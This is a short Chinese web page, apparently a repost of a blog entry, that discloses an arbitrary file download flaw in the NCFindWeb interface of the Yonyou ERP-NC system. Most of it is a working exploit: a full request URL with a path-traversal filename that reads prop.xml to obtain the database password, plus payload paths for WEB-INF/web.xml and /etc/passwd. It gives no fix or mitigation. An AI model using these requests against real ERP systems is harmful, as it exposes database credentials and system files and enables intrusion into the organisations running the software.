• 首页
  • 栏目
  • ERP
  • 用友ERP-NC系统 漏洞 NCFindWeb接口任意文件下载

用友ERP-NC系统 漏洞 NCFindWeb接口任意文件下载

  • 2021-07-28
  • Admin

该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码
在这里插入图片描述

WEB-INF/web.xml
../../../../../etc/passwd
  • 1
  • 2

原文:https://blog.csdn.net/weixin_46081055/article/details/119185699

联系站长

QQ:769220720